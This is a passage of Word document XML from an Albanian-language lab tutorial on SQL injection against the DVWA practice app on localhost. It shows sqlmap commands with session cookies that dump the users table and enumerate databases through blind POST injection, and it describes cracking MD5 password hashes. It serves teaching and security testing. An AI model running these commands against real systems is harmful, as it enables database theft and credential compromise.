        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00E44FDA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5889FB37" w14:textId="407755BB" w:rsidR="00E44FDA" w:rsidRDefault="00E44FDA" w:rsidP="00E44FDA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D20BE3A" w14:textId="36C862DA" w:rsidR="00E44FDA" w:rsidRDefault="00E44FDA" w:rsidP="00E44FDA">
      <w:r>
        <w:t xml:space="preserve">Parametri </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">–columns </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">na shërben për të printuar të gjitha kolonës e tabelës të cilën e përcaktojmë përmes parametrit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Rezulatet mund të shihen në figurën 7. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40852015" w14:textId="4E2CAC21" w:rsidR="00E44FDA" w:rsidRDefault="00E44FDA" w:rsidP="00E44FDA"/>
    <w:p w14:paraId="6C183BD5" w14:textId="77777777" w:rsidR="00180773" w:rsidRDefault="00E44FDA" w:rsidP="00180773">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3219F507" wp14:editId="20755D18">
            <wp:extent cx="3995928" cy="4471416"/>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95928" cy="4471416"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D45A69" w14:textId="17E8E3CE" w:rsidR="00E44FDA" w:rsidRDefault="00180773" w:rsidP="00180773">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc91427377"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00873C59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Printimi i skemës së tabelës users</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="35D0D26F" w14:textId="2725BDC6" w:rsidR="00180773" w:rsidRDefault="00180773" w:rsidP="00180773"/>
    <w:p w14:paraId="6DEE1969" w14:textId="0B3401E7" w:rsidR="00180773" w:rsidRDefault="000D1F11" w:rsidP="00180773">
      <w:r>
        <w:t>Pasi kemi printuar skemën e tabelës users, shohim kolonën password e cila është më e rëndësishmja e kësaj tabele. Kështu që hapi i radhës është të i nxerrim të dhënat e ruajtura në këtë tabelë.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6539BAFB" w14:textId="72C714A2" w:rsidR="000D1F11" w:rsidRDefault="000D1F11" w:rsidP="00180773"/>
    <w:p w14:paraId="5A6F88CE" w14:textId="658FC737" w:rsidR="000D1F11" w:rsidRDefault="000D1F11" w:rsidP="000D1F11">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D1F11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "127.0.0.1/vulnerabilities/sqli/?id=&amp;Submit=Submit" --cookie="PHPSESSID=fm26ua9o028nr1sa4a18qm8pf6; security=low" --dump -T users </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1F11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7388FBDE" w14:textId="693367DC" w:rsidR="000D1F11" w:rsidRDefault="000D1F11" w:rsidP="000D1F11">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="270B7FD8" w14:textId="102F9EFF" w:rsidR="000D1F11" w:rsidRDefault="000D1F11" w:rsidP="000D1F11">
      <w:r>
        <w:t xml:space="preserve">Parametri </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1F11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>shërben për të printuar të gjitha të dhënat e ruajtura në tabelë. Rezultatet mund të shihen në figurën 8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF3641F" w14:textId="4D54B7AD" w:rsidR="000D1F11" w:rsidRDefault="000D1F11" w:rsidP="000D1F11"/>
    <w:p w14:paraId="51283757" w14:textId="77777777" w:rsidR="000D1F11" w:rsidRDefault="000D1F11" w:rsidP="000D1F11">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ED5639F" wp14:editId="20E7AABA">
            <wp:extent cx="4572000" cy="3547872"/>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547872"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46174D73" w14:textId="67CDD2B2" w:rsidR="000D1F11" w:rsidRDefault="000D1F11" w:rsidP="000D1F11">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc91427378"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00873C59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Printimi i të dhënave të tabelës users</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="3E29D784" w14:textId="1A54B0B7" w:rsidR="000D1F11" w:rsidRDefault="000D1F11" w:rsidP="000D1F11">
      <w:r>
        <w:t xml:space="preserve">Në figurën 8 të theksuara me ngjyrë të bardh mund të shihen se gjatë ekzekutimit </w:t>
      </w:r>
      <w:r w:rsidR="00D55C75">
        <w:t xml:space="preserve"> të kësaj komande vegla ka detektuar se ka kolonë me emrin </w:t>
      </w:r>
      <w:r w:rsidR="00D55C75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00D55C75">
        <w:t xml:space="preserve"> dhe kërkon të di nëse ne dëshirojmë që vegla të tentoj me nje dictionary based attack të dëshifroj hash që gjenden në kolonën password, ose mundësia tjeter është të ruajmë hash në një file të veqant dhe më pas të mundohemi të i dëshifrojmë me ndonjë tool tjetër si p.sh aircrack ng. Meqenëse databaza ne fjalë nuk është e siguruar si duhet, fjalëkalimet janë të ruajtur në hash me MD5 të cilin vegla ka mundur të i dëshifroj dhe në figurën 8 mund të shihen fjalëkalimet edhe si plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0C228A" w14:textId="7295DB9A" w:rsidR="00D55C75" w:rsidRDefault="00D55C75" w:rsidP="000D1F11"/>
    <w:p w14:paraId="7A168A1E" w14:textId="30E2E3E1" w:rsidR="00D55C75" w:rsidRDefault="00D55C75" w:rsidP="000D1F11">
      <w:r>
        <w:t xml:space="preserve">Në vazhdim do të ekzekutojmë komandën për të i dëshifruar fjalëkalimet e </w:t>
      </w:r>
      <w:r w:rsidR="00C858E0">
        <w:t>përdoruesve të databazës , pra jo të aplikacionit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4D0F53" w14:textId="26519BCD" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000D1F11"/>
    <w:p w14:paraId="6C3B8B7B" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="00C858E0">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42851B9A" wp14:editId="0BCA58A7">
            <wp:extent cx="3995928" cy="466344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5928" cy="4663440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D2C73D" w14:textId="6D115CD0" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="00C858E0">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc91427379"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00873C59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tentimi jo i sukseshëm për dëshifrimin e fjalëkalimeve</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="03CD9352" w14:textId="00996FA8" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="00C858E0"/>
    <w:p w14:paraId="195D42B8" w14:textId="35D06A17" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="00C858E0">
      <w:r>
        <w:t>Në figurën 9, shihet se vegla ka qenë jo e sukseshme në dëshifrimin e fjalëkalimeve të përdorueve të databazës. Pra jo çdo sulm është i suksesshëm ndaj çdo databaze, prandaj duhet të dijmë se qfarë sulme të përdorim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1782BAA4" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRPr="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="00C858E0"/>
    <w:p w14:paraId="270BA688" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B9D8EEB" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6524E01D" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4589AB77" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F8D791" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E933ED" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B459FE8" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E714D57" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6834538B" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AFDF6EE" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D342907" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="161AE510" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E422D03" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A68B32" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="174E1C4B" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF345F0" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A465DC7" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C384E3" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC16CCA" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17338216" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="361A4764" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="00C858E0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2F6C43" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="00C858E0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C2BE8C" w14:textId="77777777" w:rsidR="00C858E0" w:rsidRDefault="00C858E0" w:rsidP="00C858E0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53421620" w14:textId="77777777" w:rsidR="00C702E5" w:rsidRDefault="00C702E5" w:rsidP="00C702E5">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30D0CAE3" wp14:editId="3D52B928">
            <wp:extent cx="3995928" cy="4306824"/>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5928" cy="4306824"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44164108" w14:textId="021E3423" w:rsidR="00C702E5" w:rsidRDefault="00C702E5" w:rsidP="00C702E5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc91427380"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00873C59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Forma për blind sql injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="67E67188" w14:textId="77777777" w:rsidR="00C702E5" w:rsidRDefault="00C702E5" w:rsidP="00C702E5"/>
    <w:p w14:paraId="6A96BB6D" w14:textId="77777777" w:rsidR="00C702E5" w:rsidRDefault="00C702E5" w:rsidP="00C702E5"/>
    <w:p w14:paraId="1456197D" w14:textId="77777777" w:rsidR="00C702E5" w:rsidRDefault="00C702E5" w:rsidP="00C702E5">
      <w:r>
        <w:t xml:space="preserve">Në  figurën  10 shihet forma e cenushme ndaj sql injection. Mirëpo  për dallim nga </w:t>
      </w:r>
      <w:r w:rsidR="00B66DAE">
        <w:t>shembulli i kaluar kjo është një POST request, nga e cila nuk presim të dhëna. Prandaj duhet përdorur sulm i llojit blind sql injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B10275" w14:textId="77777777" w:rsidR="00B66DAE" w:rsidRDefault="00B66DAE" w:rsidP="00C702E5"/>
    <w:p w14:paraId="67D1F2FC" w14:textId="77777777" w:rsidR="00B66DAE" w:rsidRDefault="00B66DAE" w:rsidP="00B66DAE">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17E1EFF1" wp14:editId="41AAF826">
            <wp:extent cx="3995928" cy="4306824"/>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95928" cy="4306824"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="779C362F" w14:textId="55A32C83" w:rsidR="00B66DAE" w:rsidRDefault="00B66DAE" w:rsidP="00B66DAE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc91427381"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00873C59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Analiza e kërkesës POST</w:t>
      </w:r>
      <w:r w:rsidR="00FB3A8D">
        <w:t xml:space="preserve"> BSI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="71694744" w14:textId="77777777" w:rsidR="00B66DAE" w:rsidRDefault="00B66DAE" w:rsidP="00B66DAE"/>
    <w:p w14:paraId="1FA4FE11" w14:textId="77777777" w:rsidR="00B66DAE" w:rsidRDefault="00B66DAE" w:rsidP="00B66DAE"/>
    <w:p w14:paraId="6CA61C30" w14:textId="77777777" w:rsidR="00B66DAE" w:rsidRDefault="00B66DAE" w:rsidP="00B66DAE">
      <w:r>
        <w:t>Meqenëse kërkesa është e llojit POST , përveq Cookies duhet të dërgojmë edhe form data në body të kërkesës. Për këtë na ndihmojnë prap developer tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752A7DBE" w14:textId="77777777" w:rsidR="00B66DAE" w:rsidRDefault="00B66DAE" w:rsidP="00B66DAE">
      <w:r>
        <w:t xml:space="preserve">Pas analizës së kërkesës formojmë </w:t>
      </w:r>
      <w:r w:rsidR="000668E6">
        <w:t>komandën.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D91418C" w14:textId="77777777" w:rsidR="000668E6" w:rsidRDefault="000668E6" w:rsidP="00B66DAE"/>
    <w:p w14:paraId="4407CF10" w14:textId="77777777" w:rsidR="000668E6" w:rsidRDefault="000668E6" w:rsidP="000668E6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000668E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sqlmap -u "127.0.0.1/vulnerabilities/sqli_blind/" --cookie="PHPSESSID=fm26ua9o028nr1sa4a18qm8pf6; security=medium" --data="id=1&amp;Submit=Submit" -p id --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5300F6B3" w14:textId="77777777" w:rsidR="000668E6" w:rsidRDefault="000668E6" w:rsidP="000668E6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="697FA413" w14:textId="77777777" w:rsidR="000668E6" w:rsidRDefault="000668E6" w:rsidP="000668E6">
      <w:r>
        <w:t xml:space="preserve">Vërejmë  se security ka kaluar në medium. Parametri </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">–data </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> përmban form data të cilat në POST request nuk dërgohen në url. Parametri </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-p </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> përcakton se cilat parametra të databazës të testohen për vulnerabilities. Dhe parametri </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–dbs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> printon  emrat e databazave të marra nga injektimi. Rezultatet mund të shihen në figurën 12.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BE9571" w14:textId="77777777" w:rsidR="000668E6" w:rsidRDefault="000668E6" w:rsidP="000668E6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F376743" wp14:editId="6BCEA341">
            <wp:extent cx="3995928" cy="466344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5928" cy="4663440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37690B57" w14:textId="749D8C23" w:rsidR="000668E6" w:rsidRDefault="000668E6" w:rsidP="000668E6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc91427382"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00873C59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Printimi i emrave të databazave</w:t>
      </w:r>
      <w:r w:rsidR="00FB3A8D">
        <w:t xml:space="preserve"> BSI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="0F2BFCF3" w14:textId="77777777" w:rsidR="000668E6" w:rsidRDefault="000668E6" w:rsidP="000668E6"/>
    <w:p w14:paraId="7934258D" w14:textId="77777777" w:rsidR="000668E6" w:rsidRDefault="000668E6" w:rsidP="000668E6"/>
    <w:p w14:paraId="6370A4F1" w14:textId="77777777" w:rsidR="00FB3A8D" w:rsidRDefault="00FB3A8D" w:rsidP="000668E6">
      <w:r>
        <w:t xml:space="preserve">Pas nxjerrjes së informacionit për emrat e databazave, targetojmë databazën dvwa. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C980485" w14:textId="77777777" w:rsidR="00FB3A8D" w:rsidRPr="00FB3A8D" w:rsidRDefault="00FB3A8D" w:rsidP="00FB3A8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
